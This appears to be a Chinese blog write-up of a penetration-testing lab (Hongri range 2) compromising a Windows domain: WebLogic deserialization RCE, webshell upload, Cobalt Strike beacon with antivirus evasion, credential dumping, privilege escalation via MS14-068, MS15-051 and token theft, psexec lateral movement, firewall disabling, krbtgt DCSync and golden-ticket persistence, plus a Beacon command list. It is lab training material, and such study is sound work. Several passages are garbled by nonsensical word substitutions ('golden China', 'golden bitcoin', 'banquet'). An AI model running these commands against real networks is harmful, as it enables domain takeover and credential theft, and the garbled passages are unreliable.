红日靶场二游记
靶场拓扑图如下所示:
环境说明
DC:
IP:10.10.10.10
操作系统:Windows 2012
应用:AD域
WEB(初始的状态默认密码登录,切换用户 de1ay/1qaz@WSX 登录):
IP1:10.10.10.80
IP2:192.168.111.80
OS:Windows 2008
应用:Weblogic 10.3.6 MSSQL 2008
电脑:
IP1:10.10.10.201
IP2:192.168.111.201
操作系统:Windows 7
内网网段:10.10.10.0/24
DMZ网段:192.168.111.0/24
WEB服务器需要以管理员身份手动开启服务,在C:OracleMiddlewareuser_projectsdomainsbase_domainbin下运行批处理程序startWeblogic即可启动的WebLogic
WEB机和PC机:计算机右键- >管理- >配置- >服务- >服务器,工作站,计算机浏览器全部启动,注意PC机需要关闭防火墙,否则其他两台机器无法ping通PC机(防火墙导致无法发送icmp包)
这里是为了方便在将物理机实现为攻击机,在WEB服务器中增加桥接网络,以便物理机能直接访问WEB服务器
WEB服务器信息收集
该WEB服务器桥接网段为192.168.0.1/24,该主机IP为192.168.0.6,是WEB服务器首次对80端口进行收集,发现该端口没有内容,nmap该服务器信息 端口和服务如下:
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Site doesn't have a title.
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds
1433/tcp open ms-sql-s Microsoft SQL Server 2008 R2 10.50.4000.00; SP2
| ms-sql-ntlm-info:
| Target_Name: DE1AY
| NetBIOS_Domain_Name: DE1AY
| NetBIOS_Computer_Name: WEB
| DNS_Domain_Name: de1ay.com
| DNS_Computer_Name: WEB.de1ay.com
| DNS_Tree_Name: de1ay.com
|_ Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2021-07-22T05:27:37
| Not valid after: 2051-07-22T05:27:37
| MD5: cd9c a9a8 84fd a39f 5073 9bfc 9ae7 dec5
|_SHA-1: 02e4 f828 917e 4978 0f8b d4c5 f253 da95 0b86 bd94
|_ssl-date: 2021-07-22T12:46:41+00:00; 0s from scanner time.
3389/tcp open ms-wbt-server Microsoft Terminal Service
| ssl-cert: Subject: commonName=WEB.de1ay.com
| Issuer: commonName=WEB.de1ay.com
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2021-07-21T05:28:19
| Not valid after: 2022-01-20T05:28:19
| MD5: c1d1 9a76 c599 358a 8527 34a6 b00f 6ce2
|_SHA-1: 71eb 0238 090b 80ea d143 36aa d3c0 7f8d bd5c 4d18
|_ssl-date: 2021-07-22T12:46:40+00:00; 0s from scanner time.
7001/tcp open http Oracle WebLogic Server (Servlet 2.5; JSP 2.1)
|_http-title: Error 404--Not Found
|_weblogic-t3-info: T3 protocol in use (WebLogic version: 10.3.6.0)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC开放了几个高危端口都之出,445个可能存在的端口,利用开放即存在的smb服务就存在17-010个端口存在漏洞,开放139端口,就存在Samba服务,可能存在爆破/授权访问/远程命令执行漏洞,1433端口命令执行漏洞,1433端口命令则说明该服务器部署mssql,可能存在mssql弱口令,从而通过mssql执行及权限等操作,7001端口开放WebLogic Server,由于是WEB服务器,因此可以先从web逻辑。
使用检测weblogicScan是否存在已知漏洞:
发现可能存在的反序列化漏洞,使用工具进行检测成功RCE
由于之前检测uddiexplorer开放,这里选择将冰蝎壳上传到uddiexplorer目录下:
冰蝎连接后成功getshell
外打成功,下面展开对内网的信息收集和横向网点。
内网信息收集与横向
发现存在3个网段,其中192.168.0.6是桥接网段,判断内网还存在192.168.111.1/24和10.10.10.1/24两个网段
这里首先需要提权,因此先行CS上线,360有手就行直接用PS上线,这里存在360杀软件
注意:在靶机中实际使用powershell,并且powershell无法禁止运行,绕过360使用uuid智能的exe免杀,这里是为了方便开启上帝模式使用ps上线
上线后先频繁抓取使用下内存中的NTML哈希等,由于WEB服务器为Windows Server 2008,因此可以抓取获取明文密码:
WEB服务器很幸运的被域控DC登陆过,因此有了控制DC管理员的明文密码
查看已经打上的权利,利用未解决提提:
这里想使用CVE-2018-8120提权,并且该脚本使用大量2008版本的机器,但是本地一打所有的CS就掉线了,也不知道是啥原因。
cve-2019-0803也会因为杀软的存在而无法上传文件成功,看其他文章使用的是ms14-068可以提权成功,但本地没有该脚本,所以先放介绍下其原理:
该漏洞可能允许者向底层用户账户的权限,提权到底层管理员的权限,即如果该漏洞可以利用,那么只需要向底层用户账户提供权限即可,并且可以创建域管理员进行权限维持,应该通过查看是否打补丁(KB3011780)来判断是否存在漏洞。
利用ms14-068.exe提权工具生成明天的kerberos协议证书
MS14-068.exe -u <userName>@<domainName> -p <clearPassword> -s <userSid> -d <domainControlerAddr>
运行完成该命令后生成在当前文件夹生成再通过Mimikatz文件进行导入后:
mimikatz # kerberos::purge //清空当前凭证
mimikatz # kerberos::list //查看当前机器凭证
mimikatz # kerberos::ptc 票据文件 //将上一步生成的票据注入到内存中届时便能够以天气的域管理员身份来域控,或者通过P**ec工具来获取域控的炮弹,添加域管理员等操作:
使用的是最后一个CS内置模块evelate中的ms15-051进行提权
官方表示该漏洞影响的信息有:
Windows Server 2003,Windows Vista,Windows Server 2008,Windows Server 2008 R2等
成功获得SYSTEM权限
这里也可以通过权窃取的方式进行提:
meterpreter > load incognito //加载incognito
meterpreter > getuid //查看当前token
meterpreter > list_tokens -u //列出可用token
meterpreter > impersonate_token "NT AUTHORITY\SYSTEM" //token窃取,格式为impersonate_token"主机名\用户名"
meterpreter > getuid //查看当前token
meterpreter > rev2self //返回之前的token 
Windows 中的隐身
Metasploit中的隐身,是从windows平台下的隐身移植过来的,下面介绍一下windows平台下的隐身
常见用法如下:
列举token:incognito.exe list_tokens -u
复制token:incognito.exe execute [options] <token> <command>
提权至system:incognito.exe execute -c "NT AUTHORITYSYSTEM" cmd.exe
降权至当前用户:incognito.exe execute -c "WIN-R7MM90ERBMDa" cmd.exe
伪造用户:incognito.exe execute -c "WIN-R7MM90ERBMDb" cmd.exe虽然通过CS进行steal token却以失败告终,这里还不太清楚,可能是需要管理员Administrator才能进行steal token操作。
利用Token获得TrustedInstaller权限
在Windows系统中,获得了管理员修改权限和系统权限,也不能系统文件
因为在Windows系统的最高权限为TrustedInstaller
我们可以使用以下方法来判断是否获得TrustedInstaller权限:
1.验证是否获得TrustedInstaller权限的方法
对特殊路径写文件echo 1 > C:Windowsservicing1.txt
使用whoamiwhoami /groups | findstr TrustedInstaller
使用PowershellGet-Acl -Path C:WindowsservicingTrustedInstaller.exe |select Owner
2.getsystem
提升命令到系统权限3.sc命令启动服务TrustedInstaller
shell sc start trustedinstaller
4.ps找到TrustedInstaller的pid
ps
5.使用incognito获取TrustedInstaller.exe的token
steal_token TrustedInstall.exe的PID
6.写入文件成功,代表获得了TrustedInstaller权限
域信息收集
ipconfig /all发现机器有双网卡,内网10.10.10.1/24段,域控为ip 10.10.10.10(注意:域控一般是本机的DNS服务器)
-
观域内主机:net view
-
关闭防火墙 netsh advfirewall set allprofiles state off
注意在收集凭证收集时收集到了 mssql 用户用户的密码,该用户是在该用户驻留的过程中,过程中没有该用户驻留的过程,因此我们使用 spawn 来切换用户:
转义用户后发现该同样是域用户:
此时域信息收集清楚:
使用Ladon探测下域三台主机的IP和相关信息,准备进行渗透:
分别为:
10.10.10.10 域控 DC
10.10.10.80 WEB 服务器
10.10.10.201 PC 主机由于已经存在相关凭证,这里 注意使用p**ec域控制上线:
需要使用p**ec模块时会话必须是系统权限并且可以使用SMB监听器进行监听
成功拿下域控DC服务器
此时在抓取下域控制服务器的Hash:
实际登录域内连接控制主机后已经可以单独一台主机,这里还有一台PC机没有上线CS,这里我们直接使用p**ec PC服务器,使用控制主机的会话视频:
整个域内全部主机上线:
域控权限维持
在域控获得KRBTGT界面NTLM密码攻击和SID
并且获得一个域管理员的SID
黄金中国利用
黄金比特币是英国的口口口舌(TGT),也被认证消息中心。TGT仅用于域控制器上的密钥(KDC)证明用户已被域其他控制器认证。
黄金英国的条件要求:
1.域名称
2.域的SID值
3.域的KRBTGT账户NTLM密码密码
4.明天你名
黄金新闻可以在拥有普通用户权限和KRBTGT游戏的情况下获得域管理员权限,外观获得域控的系统权限,还可以使用黄金商业权限维持,当域控制权限掉之后,在通过域内的其他机器突然获取权限。
可以通过mimikatz命令直接获取krbtgt的SID值和哈希值。
lsadump::dcsync /domain:test.com /user:krbtgt
下面演示下在WEB服务器中使用mssql用户来晚宴
访问高清:
晚宴晚宴之后:晚宴成功后:
以 mssql 用户: 给
黄金报表后:
结尾贴下Beacon的指令介绍
browserpivot 注入受害者浏览器进程
bypassuac 绕过UAC提升权限
cancel 取消正在进行的下载
cd 切换目录
checkin 强制让被控端回连一次
clear 清除Beacon内部的任务队列
covertvpn 部署Covert VPN客户端
cp 复制文件
dcsync 从DC中提取密码Hash
desktop 远程桌面服务
dllinject 反射DLL注入进程
download 下载文件
downloads 列出正在进行的文件下载
drives 列出目标盘符
elevate 使用exp
execute 在目标机上执行程序
exit 结束beacon会话
getsystem 尝试获取SYSTEM权限
getuid 获取用户ID
hashdump 转储密码Hash值
inject 在注入进程生成会话
jobkill 结束一个后台任务
jobs 列出后台任务
kerberos_ccache_use 从cache文件中导入票据应用于此会话
kerberos_ticket_purge 清除当前会话的票据
kerberos_ticket_use 从ticket文件中导入的票据应用于此会话
keylogger 键盘记录
kill 结束进程
link 通过命名管道连接到Beacon对等点
logonpasswords 使用Mimikatz转储密码hash和凭证
ls 列出文件
make_token 创建令牌以传递凭据
mimikatz 运行Mimikatz命令
mkdir 创建目录
mode dns 使用DNS A作为通信通道
mode dns-txt 使用DNS TXT作为通信通道
mode dns6 使用DNS AAAA作为通信通道
mode http 使用HTTP作为通信通道
mv 移动文件
net 运行net命令
note 备注
portscan 端口扫描
powerpick 通过unmanaged powershell执行命令
powershell 通过powershell.exe执行命令
powershell-import 导入powershell脚本
ppid 为派生的post-ex进程设置父PID
ps 展示进程列表
p**ec 使用服务在主机上生成会话
p**ec_psh 使用PowerShell在主机上生成会话
psinject 在特定进程中执行PowerShell命令
pth 使用Mimikatz进行哈希传递
pwd 显示出当前目录
rev2self 恢复原始令牌
rm 删除文件或文件夹
rportfwd 端口转发
runas 以其他用户权限执行程序
runu 以其他进程ID执行程序1
screenshot 屏幕截图
shell 执行cmd命令
shinject 将shellcode注入进程
shspawn 启动一个进程并将shellcode注入
sleep 设置休眠时间
socks 启动SOCKS4代理
socks stop 停止SOCKS4
spawn 生成会话
spawnas 以另一用户身份生成会话
spawnu 以另一进程ID生成会话
ssh 使用ssh连接远程主机
ssh-key 使用密钥连接远程主机
steal_token 从进程中窃取令牌
timestomp 将一个文件的时间戳应用到另一个文件
unlink 断开连接
upload 上传文件
wdigest 使用Mimikatz转储明文凭据
winrm 使用WinRM横向渗透
wmi 使用WMI横向渗透
本文始发于微信公众号(疯猫网络):红日靶场二游记
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论